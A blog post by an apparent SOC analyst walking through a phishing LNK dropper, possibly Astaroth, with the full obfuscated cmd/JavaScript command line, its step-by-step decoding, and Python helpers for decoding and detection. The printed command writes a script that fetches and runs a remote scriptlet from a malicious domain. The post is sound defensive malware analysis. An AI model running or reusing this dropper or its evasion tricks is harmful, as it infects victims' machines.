LNK Dropper — Malware Analysis

6 min read · Feb 11, 2024

Recently, while working as a SOC Analyst at my company, I stumbled across a phishing mail containing a malicious URL whose purpose was to trick the victim into downloading a ZIP file containing a dropper that would eventually download the malware on the victim’s PC.

The LNK file is the first ring of a chain of malicious scripts and after further analysis made by a friend, it seems to be the dropper of the Astaroth malware.

At the time of writing this article I got to the 7th step of the Astaroth infection process provided by Talos, though I’m not 100% sure about its belonging to that malware campaign.

Before starting I need to make a premise. I have little experience in malware analysis; I'm learning while doing it, applying skills I've learned elsewhere. There's for sure a simpler way to deobfuscate and analyze the payload I will present; this is my way. If you want to suggest another way to do it, a tool, or just discuss, please feel free to comment down below.

Also, I would like to introduce a couple of concepts that I learned on the way while analyzing the malicious script.

Windows can run scripts written in scripting languages such as VBScript or JavaScript through Windows Script Host (WSH), which you can think of as a framework. Interaction with the Windows OS is possible thanks to the Component Object Model (COM), which provides a standard way for programs to interact and share functionality, similar to an API.

As stated before, the dropper is an LNK file. You can download the original ZIP file from this link after converting it from Hexdump format (just click the save icon).

Once you have downloaded the ZIP file, you will find an mp4 file, which is a base64-encoded payload, and the malicious LNK file.

LNK properties

Payload extraction

Running the UNIX strings command against it, I extracted the obfuscated command.

C:\Windows\System32\cONhosT.exe %COMSpeC% /V/D/c "S^eT SSG=C:\qoZG9P\&& mD !SSG!>nul 2>&1&&S^eT UFWN=!SSG!^PEBCPADO.JS&&<nul set/p LAXA=var LAXA='\u0055\u004c\u0064\u002b\u0044\u0055\u004c\u0064\u002b\u0045\u0055\u004c\u0064\u002b\u0022\u002f\u002f\u0074\u0034\u006f\u0061\u0070\u0066\u002e\u0063\u0068\u0075\u0063\u0072\u0075\u0074\u0065\u0064\u0061\u0064\u0069\u006c\u006d\u0061\u006f\u002e\u0063\u006c\u006f\u0075\u0064\u002f\u003f\u0032\u002f\u0022\u0029\u003b';SSG='\u003a\u0068\u0022\u003b\u0045\u0055\u004c\u0064\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';PEBC='\u0076\u0061\u0072\u0020\u0043\u0055\u004c\u0064\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0055\u004c\u0064\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';UFWN=PEBC+SSG+LAXA;PADO=new Function(UFWN);PADO(); >!UFWN!|caLl !UFWN!||caLl !UFWN! "

A real mess right?

Analysis

To the batch-cave!

The first thing to do is to convert the Unicode-escaped characters to text. After conversion, the complete LNK target looks like the following.

The first executable invoked is “C:\Windows\System32\cONhosT.exe”, deliberately written in mixed case to evade detection. Conhost stands for “Console Window Host” and is most commonly known as “cmd.exe”. So yes, it will open a command prompt window.

C:\Windows\System32\cONhosT.exe %COMSpeC% /V/D/c

What follows are arguments passed to conhost.exe.

The environment variable “%COMSpeC%” expands to “C:\Windows\system32\cmd.exe”, and it is followed by the flags “/V”, “/D” and “/c”, which respectively do the following:

  • /V: This flag enables delayed environment variable expansion. When enabled, variables are expanded at execution time rather than at parse time.
  • /D: This flag sets the current directory of the new Command Prompt instance to the same directory as the calling process. Simply put, if the LNK resides in “C:\Users\Bob\Desktop\”, the new CMD session will start in the same directory.
  • /c: This flag specifies that the Command Prompt should execute the commands (in this case the payload) provided after it and then terminate.

Payload

The payload is what’s executed after spawning the command prompt.

To better understand the payload, I have broken it down into several stages.

S^eT SSG=C:\qoZG9P\

The variable SSG is set to the path “C:\qoZG9P\”, which does not exist yet.

mD !SSG!>nul 2>&1

The mixed-case command “mD” is an alias of mkdir and creates a directory at the path held in the previously set variable SSG. Any output is redirected to nul (>nul). Finally, 2>&1 redirects the standard error (2) stream to the standard output (1) stream. Maybe it has been done for debugging purposes and then left there.

S^eT UFWN=!SSG!^PEBCPADO.JS

The variable UFWN is set to the value of SSG followed by a random string with a .JS extension, so UFWN becomes “C:\qoZG9P\PEBCPADO.JS”.

<nul set/p LAXA=var LAXA='ULd+DULd+EULd+"//t4oapf.chucrutedadilmao.cloud/?2/");';
SSG=':h";EULd="Tt"+"P:";GetObject(C';PEBC='var CULd="s"+"cr";DULd="ipt"+"';
UFWN=PEBC+SSG+LAXA;
PADO=new Function(UFWN);
PADO();

This is where I initially got a bit tricked by the dropper, since I never coded in batch but in bash. Whenever you declare a variable without surrounding it with quotes in bash, everything coming after a space is not considered part of the variable value. Batch works differently: in fact, everything you see after the first LAXA= is JavaScript code contained in the variable.

The leading <nul redirects standard input from the null device. Here it is used as a trick to suppress the wait for user input.

set /p is a command used to set the value of an environment variable from input typed by the user, and the text after the equals sign is the prompt it prints to standard output before reading. When paired with <nul there is no input to read, so the variable is set without user interaction and the prompt text (here, the JavaScript code) is simply written to standard output, without a trailing newline.

Payload inside the payload: JavaScript

It’s now time to see what the JavaScript code does, even if it’s already pretty clear that we are dealing with a URL that will be contacted to download something nasty.

var LAXA='ULd+DULd+EULd+"//t4oapf.chucrutedadilmao.cloud/?2/");';
SSG=':h";EULd="Tt"+"P:";GetObject(C';
PEBC='var CULd="s"+"cr";DULd="ipt"+"';
UFWN=PEBC+SSG+LAXA;
PADO=new Function(UFWN);
PADO();

Three of the five JavaScript variables (LAXA, SSG and UFWN) reuse the names of the batch variables, to confuse analysts.

PEBC, SSG and LAXA contain further JavaScript code, as strings, responsible for downloading the malicious program that will infect the victim’s machine. Once declared, these three strings are concatenated in the right order into the UFWN variable, which is passed as the parameter to new Function(); the resulting function is stored in PADO and executed on the last line.

By solving the puzzle, the function contained in PADO will look like the following.

var CULd="s"+"cr";
DULd="ipt"+":h";
EULd="Tt"+"P:";
GetObject(CULd+DULd+EULd+"//t4oapf.chucrutedadilmao.cloud/?2/");
// script:hxxp[://]t4oapf[.]chucrutedadilmao[.]cloud/?2/
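The Unicode decoding described earlier and the string "puzzle" above can both be done statically, without running any of the dropper's code. The following Python helper is an added example (my own code, not part of the original analysis); it assumes the JavaScript portion of the LNK command line is available as a string (the three escaped strings are copied from the command above) and resolves the GetObject() argument from it.

```python
import re
# Sample input: the JavaScript part of the LNK command line quoted above,
# with its three \uXXXX-escaped strings and the new Function() concatenation.
SAMPLE_CMD = (
    r"var LAXA='\u0055\u004c\u0064\u002b\u0044\u0055\u004c\u0064\u002b"
    r"\u0045\u0055\u004c\u0064\u002b\u0022\u002f\u002f\u0074\u0034\u006f\u0061\u0070\u0066"
    r"\u002e\u0063\u0068\u0075\u0063\u0072\u0075\u0074\u0065\u0064\u0061\u0064\u0069\u006c"
    r"\u006d\u0061\u006f\u002e\u0063\u006c\u006f\u0075\u0064\u002f\u003f\u0032\u002f\u0022"
    r"\u0029\u003b';SSG='\u003a\u0068\u0022\u003b\u0045\u0055\u004c\u0064\u003d\u0022\u0054"
    r"\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a"
    r"\u0065\u0063\u0074\u0028\u0043';PEBC='\u0076\u0061\u0072\u0020\u0043\u0055\u004c\u0064"
    r"\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0055\u004c\u0064"
    r"\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';UFWN=PEBC+SSG+LAXA;"
    r"PADO=new Function(UFWN);PADO();"
)

def decode_unicode_escapes(text):
    # Replace every \uXXXX escape with the character it encodes (no eval involved).
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)

def fold_string_concat(js):
    # Merge adjacent "a"+"b" literals until the text stops changing.
    folded = re.sub(r'"([^"]*)"\+"([^"]*)"', r'"\1\2"', js)
    return js if folded == js else fold_string_concat(folded)

def rebuild_function_body(cmd):
    # Decode, collect the NAME='...' chunks, then join them in the order that
    # the X=A+B+C assignment feeds them to new Function(X).
    js = decode_unicode_escapes(cmd)
    chunks = dict(re.findall(r"(\w+)='([^']*)'", js))
    order = re.search(r"(\w+)=((?:\w+\+)+\w+);\w+=new Function\(\1\)", js)
    return "".join(chunks[name] for name in order.group(2).split("+"))

def resolve_getobject_moniker(body):
    # Fold literals, map the double-quoted assignments, then evaluate the
    # GetObject(...) argument by substituting variables and stripping quotes.
    # The "script:" prefix is the Windows Script Component moniker, so the
    # remote file is fetched and run as a scriptlet.
    body = fold_string_concat(body)
    values = dict(re.findall(r'(\w+)="([^"]*)"', body))
    arg = re.search(r"GetObject\(([^)]*)\)", body).group(1)
    return "".join(values.get(p, p.strip('"')) for p in arg.split("+"))

def defang(moniker):
    # Neutralise the indicator for reports: hxxp and bracketed dots/scheme.
    return (re.sub(r"(?i)http", "hxxp", moniker)
            .replace("://", "[://]").replace(".", "[.]"))

if __name__ == "__main__":
    body = rebuild_function_body(SAMPLE_CMD)
    print(body)
    print(defang(resolve_getobject_moniker(body)))
```

Note that the resolved moniker keeps the attacker's mixed-case scheme (hTtP), another small trick against naive string matching; defang() normalises it.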

I still haven’t managed to find good documentation about the GetObject function, but after digging a bit with an AI, it turns out that GetObject is used to create an instance of a COM object based on its programmatic identifier (ProgID) or its moniker.

For example, the following JavaScript code retrieves a reference to the WSH Shell object, which allows interaction with the Windows shell.

var shell = GetObject("WScript.Shell");

Anyway, judging by the parameter passed to GetObject in our case, which is a URL, the function can apparently also create instances of COM objects retrieved from the web.

Back to Batch

Now that we have a better view of the variables’ values, it’s time to see how the whole JavaScript code gets executed.

Do you remember the batch variable UFWN, containing the path to a JavaScript file? All the JS code we just saw is redirected to the path stored in that variable, and so it is written to the file.

>!UFWN!|caLl !UFWN!||caLl !UFWN!

After that, the script at the path held in UFWN is executed by call. The two call commands are separated by a double pipe (||), which means that if the first attempt to run the JavaScript file fails, the payload will try to run it again.

At the moment Kaspersky is the only vendor that recognizes the URL found during the analysis as malicious.

Summary

In brief, what the LNK dropper does is:

  • Spawn a Command Prompt session
  • Create a directory in C:\
  • Write JavaScript code that downloads the malware from a remote URL with the COM GetObject function
  • Run the downloaded malware
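From a SOC point of view, the traits listed above are also what a process-creation log of this chain looks like. The following Python triage heuristic is an added example (my own code, not from the original analysis) that normalises a cmd.exe command line against the dropper's caret and case tricks and counts how many of those traits are present; the Sysmon-style records are constructed samples, the first being an abbreviated copy of the command line analysed above.

```python
import re

# Constructed process-creation command lines: an abbreviated copy of the
# LNK dropper line analysed above plus two benign cmd.exe invocations.
SAMPLE_EVENTS = [
    {"CommandLine": r'C:\Windows\System32\cONhosT.exe %COMSpeC% /V/D/c "S^eT SSG=C:\qoZG9P\&& '
                    r'mD !SSG!>nul 2>&1&&S^eT UFWN=!SSG!^PEBCPADO.JS&&<nul set/p LAXA=var '
                    r"LAXA='\u0055\u004c\u0064\u002b';UFWN=PEBC+SSG+LAXA;PADO=new Function(UFWN);"
                    r'PADO(); >!UFWN!|caLl !UFWN!||caLl !UFWN! "'},
    {"CommandLine": r'C:\Windows\System32\cmd.exe /c dir C:\Users\Bob\Desktop'},
    {"CommandLine": r'C:\Windows\System32\cmd.exe /V:ON /c "set /p name=Enter name: "'},
]

def normalize_cmdline(cmdline):
    # Undo the dropper's anti-matching tricks: carets inside keywords (S^eT, caLl),
    # random letter case, and the optional space in "set /p".
    cmd = cmdline.replace("^", "").lower()
    return re.sub(r"set\s+/p", "set/p", cmd)

def mixed_case_image(path):
    # A system binary logged as cONhosT.exe is neither lower, upper nor Capitalized.
    name = path.rsplit("\\", 1)[-1]
    return name not in (name.lower(), name.upper(), name.capitalize())

def lnk_dropper_indicators(event):
    # Return the traits of this dropper present in one command line (heuristic:
    # the first whitespace-separated token is taken as the image path).
    raw = event["CommandLine"]
    cmd = normalize_cmdline(raw)
    hits = []
    if re.search(r"\w\^\w", raw):
        hits.append("caret-split keyword")
    if mixed_case_image(raw.split()[0]):
        hits.append("mixed-case host binary")
    if "/v" in cmd and "set/p" in cmd and ">!" in cmd:
        hits.append("set /p output redirected into a delayed-expansion path")
    if ".js" in cmd and "new function(" in cmd:
        hits.append("javascript dropped and assembled with new function()")
    if "\\u00" in cmd:
        hits.append("unicode-escaped payload")
    return hits

def is_suspicious(event, threshold=3):
    # Three or more traits together are very unlikely in a benign cmd.exe launch.
    return len(lnk_dropper_indicators(event)) >= threshold

def scan(events):
    # Indices of the events that should be escalated for analyst review.
    return [i for i, e in enumerate(events) if is_suspicious(e)]
```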

0xFF🪤 https://pwnyour.site